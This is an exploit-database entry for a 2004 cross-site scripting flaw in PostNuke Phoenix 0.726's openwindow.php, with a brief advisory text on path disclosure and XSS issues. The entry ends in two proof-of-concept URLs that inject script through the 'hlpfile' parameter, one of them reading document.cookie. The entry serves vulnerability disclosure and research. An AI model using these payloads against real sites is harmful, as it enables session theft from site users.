PostNuke Phoenix 0.726 - 'openwindow.php?hlpfile' Cross-Site Scripting

Author: Janek Vind
type: webapps
platform: php
port: 
date_added: 2004-04-21  
date_updated: 2013-01-11  
verified: 1  
codes: CVE-2004-1957;OSVDB-5630  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 24037.txt  
source: https://www.securityfocus.com/bid/10191/info

Multiple vulnerabilities were reported to exist in PostNuke Phoenix. The following specific vulnerabilities were reported:

- Multiple path disclosure vulnerabilities that occur when a user directly requests scripts in the "/includes/blocks/" and "pnadodb" directories. This issue also affects scripts that are associated in multiple modules.

- Multiple cross-site scripting vulnerabilities were reported in the Downloads and Web_Links modules as well as the openwindow.php script. These issues may permit remote attackers to cause hostile HTML and script code to be interpreted by a victim user's browser.

http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss code here]
http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>